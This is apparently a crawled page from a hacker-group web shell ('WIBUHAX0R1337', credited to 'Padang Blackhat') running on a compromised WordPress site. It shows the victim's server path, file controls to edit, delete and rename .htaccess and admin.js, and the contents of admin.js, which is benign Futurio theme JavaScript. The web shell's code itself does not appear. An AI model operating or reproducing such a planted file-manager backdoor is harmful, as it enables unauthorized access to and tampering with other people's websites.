-
WIBUHAX0R1337
-
/
home
/
coludnqa
/
public_html
/
wp-content
/
themes
/
futurio
/
js
/
admin
/
[ Home ]
Create Folder
Create File
Nama File / Folder
Size
Action
.htaccess
0.231KB
Edit File
Delete File
Rename
admin.js
1.242KB
Edit File
Delete File
Rename
/* global ajaxurl, futurioNUX */ ( function( wp, $ ) { 'use strict'; if ( ! wp ) { return; } $( function() { // Dismiss notice $( document ).on( 'click', '.futurio-notice-nux .notice-dismiss', function() { $.ajax({ type: 'POST', url: ajaxurl, data: { nonce: futurioNUX.nonce, action: 'futurio_dismiss_notice' }, dataType: 'json' }); }); }); $( function() { $( document ).on( 'click', '.sf-install-now', function( event ) { var $button = $( event.target ); if ( $button.hasClass( 'activate-now' ) ) { return true; } event.preventDefault(); if ( $button.hasClass( 'updating-message' ) || $button.hasClass( 'button-disabled' ) ) { return; } if ( wp.updates.shouldRequestFilesystemCredentials && ! wp.updates.ajaxLocked ) { wp.updates.requestFilesystemCredentials( event ); $( document ).on( 'credential-modal-cancel', function() { var $message = $( '.sf-install-now.updating-message' ); $message .removeClass( 'updating-message' ) .text( wp.updates.l10n.installNow ); wp.a11y.speak( wp.updates.l10n.updateCancel, 'polite' ); } ); } wp.updates.installPlugin( { slug: $button.data( 'slug' ) } ); }); }); })( window.wp, jQuery );
Save!!!
© 2022 - 2023 WIBUHAXOR V1 By Lutfifakee || Padang Blackhat